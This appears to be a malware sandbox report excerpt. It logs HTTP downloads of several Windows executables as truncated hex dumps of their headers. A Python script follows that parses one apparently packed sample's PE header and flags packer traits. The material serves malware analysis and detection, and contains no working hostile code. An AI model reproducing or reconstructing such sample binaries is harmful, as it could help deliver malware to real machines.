Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 05 Jul 2024 02:36:05 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "94750-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 
73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 05 Jul 2024 02:36:05 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "6dde8-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 
00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 05 Jul 2024 02:36:06 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "1f3950-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 
72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 05 Jul 2024 02:36:08 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "3ef50-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 
65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 05 Jul 2024 02:36:08 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "13bf0-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 
00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 05 Jul 2024 02:36:12 GMTContent-Type: application/octet-streamContent-Length: 1850368Last-Modified: Fri, 05 Jul 2024 01:34:22 GMTConnection: keep-aliveETag: "66874d9e-1c3c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 13 50 4a 88 72 3e 19 88 72 3e 19 88 72 3e 19 d3 1a 3d 18 86 72 3e 19 d3 1a 3b 18 28 72 3e 19 5d 1f 3a 18 9a 72 3e 19 5d 1f 3d 18 9e 72 3e 19 5d 1f 3b 18 fd 72 3e 19 d3 1a 3a 18 9c 72 3e 19 d3 1a 3f 18 9b 72 3e 19 88 72 3f 19 5e 72 3e 19 13 1c 37 18 89 72 3e 19 13 1c c1 19 89 72 3e 19 13 1c 3c 18 89 72 3e 19 52 69 63 68 88 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 84 ea 61 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 e4 04 00 00 c6 01 00 00 00 00 00 00 60 49 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 90 49 00 00 04 00 00 ec e8 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 58 a0 06 00 6c 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 40 49 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 40 49 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 dc 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 
ec 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 70 29 00 00 b0 06 00 00 02 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6f 68 6d 7a 71 6e 65 70 00 30 19 00 00 20 30 00 00 24 19 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 65 62 69 70 61 77 6f 6a 00 10 00 00 00 50 49 00 00 04 00 00 00 16 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 60 49 00 00 22 00 00 00 1a 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
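Added example (not part of the sandbox report): a section-table audit of the 1,850,368-byte executable returned by the nginx host in the response above. The header bytes are transcribed from that response's Data Raw dump (DOS header, PE/COFF and optional headers at offset 0x100, and the seven 40-byte section headers); offsets 0x40-0xFF (DOS stub and Rich header) are zero-filled because the loader never reads them. The flags it raises (blank or space-padded section names, writable+executable sections, virtual size far above raw size, entry point in the last section) are this example's own packer heuristics, not the report's signature logic. The raw-data end offset it computes equals the Content-Length the server sent, which is a cheap check that the dump was transcribed correctly.

```python
import struct

IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000
SECTION_FMT = "<8sIIIIIIHHI"  # IMAGE_SECTION_HEADER, 40 bytes

# Transcribed from the Data Raw dump of the 1,850,368-byte response above.
# Offsets 0x40-0xFF (DOS stub, Rich header) are zero-filled in build_sample();
# the loader never reads them, so every field parsed below is byte-exact.
DOS_HEADER_HEX = """
4d5a9000 03000000 04000000 ffff0000 b8000000 00000000 40000000 00000000
00000000 00000000 00000000 00000000 00000000 00000000 00000000 00010000
"""
NT_HEADERS_HEX = """
50450000 4c010700 84ea6166 00000000 00000000 e0000201 0b010e18 00e40400
00c60100 00000000 00604900 00100000 00000500 00004000 00100000 00020000
06000000 00000000 06000000 00000000 00904900 00040000 ece81c00 02004080
00001000 00100000 00001000 00100000 00000000 10000000 00000000 00000000
58a00600 6c000000 00900600 e0010000 00000000 00000000 00000000 00000000
00000000 00000000 e0404900 10000000 00000000 00000000 00000000 00000000
00000000 00000000 90404900 18000000 00000000 00000000 00000000 00000000
00000000 00000000 00000000 00000000 00000000 00000000
"""
SECTION_TABLE_HEX = """
20202000 20202020 00800600 00100000 00dc0200 00100000 00000000 00000000 00000000 400000e0
2e727372 63000000 e0010000 00900600 00020000 00ec0200 00000000 00000000 00000000 400000c0
2e696461 74612020 00100000 00a00600 00020000 00ee0200 00000000 00000000 00000000 400000c0
20202020 20202020 00702900 00b00600 00020000 00f00200 00000000 00000000 00000000 400000e0
6f686d7a 716e6570 00301900 00203000 00241900 00f20200 00000000 00000000 00000000 400000e0
65626970 61776f6a 00100000 00504900 00040000 00161c00 00000000 00000000 00000000 400000e0
2e746167 67616e74 00300000 00604900 00220000 001a1c00 00000000 00000000 00000000 400000e0
"""

def _unhex(text):
    return bytes.fromhex("".join(text.split()))

def build_sample():
    """Constructed input: real headers, zero-filled DOS stub, no section data."""
    dos = _unhex(DOS_HEADER_HEX)
    return dos + b"\x00" * (0x100 - len(dos)) + _unhex(NT_HEADERS_HEX) + _unhex(SECTION_TABLE_HEX)

def parse_pe(data):
    """Minimal PE32/PE32+ header walk: file header, entry point, section table."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    machine, n_sections, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    opt = e_lfanew + 24  # optional header follows the 4-byte signature + 20-byte file header
    entry = struct.unpack_from("<I", data, opt + 16)[0]         # AddressOfEntryPoint
    size_of_image = struct.unpack_from("<I", data, opt + 56)[0]  # SizeOfImage
    sections = []
    for i in range(n_sections):
        off = opt + opt_size + i * struct.calcsize(SECTION_FMT)
        raw_name, vsize, va, raw_size, raw_ptr, _, _, _, _, chars = struct.unpack_from(SECTION_FMT, data, off)
        sections.append({"raw_name": raw_name, "name": raw_name.rstrip(b"\0").decode("latin-1"),
                         "virtual_size": vsize, "virtual_address": va, "raw_size": raw_size,
                         "raw_ptr": raw_ptr, "characteristics": chars})
    return {"machine": machine, "entry_point": entry, "size_of_image": size_of_image, "sections": sections}

def is_clean_name(raw_name):
    """Conventional section name: non-empty, NUL-padded, printable, no blanks."""
    name = raw_name.rstrip(b"\0")
    return bool(name) and all(0x21 <= c <= 0x7E for c in name)

def audit(pe):
    """Return (name, flags) per section; each flag is one packer heuristic."""
    findings = []
    last = len(pe["sections"]) - 1
    for i, s in enumerate(pe["sections"]):
        flags = set()
        if not is_clean_name(s["raw_name"]):
            flags.add("odd-name")          # blank, space-padded or non-printable name
        if s["characteristics"] & IMAGE_SCN_MEM_WRITE and s["characteristics"] & IMAGE_SCN_MEM_EXECUTE:
            flags.add("rwx")               # writable and executable at once
        if s["virtual_size"] - s["raw_size"] >= 0x10000:
            flags.add("vsize-gap")         # >= 64 KiB of zero-filled space to unpack into
        span = max(s["virtual_size"], s["raw_size"])
        if s["virtual_address"] <= pe["entry_point"] < s["virtual_address"] + span:
            flags.add("entry-point")
            if i == last:
                flags.add("entry-in-last-section")  # stub appended after the payload
        findings.append((s["name"], flags))
    return findings

def expected_file_size(pe):
    """Highest raw end offset; for an unpadded file this is the on-disk size."""
    return max(s["raw_ptr"] + s["raw_size"] for s in pe["sections"])

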